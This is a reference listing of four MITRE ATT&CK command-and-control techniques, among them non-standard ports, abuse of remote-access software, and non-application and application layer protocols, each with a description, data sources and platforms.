Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre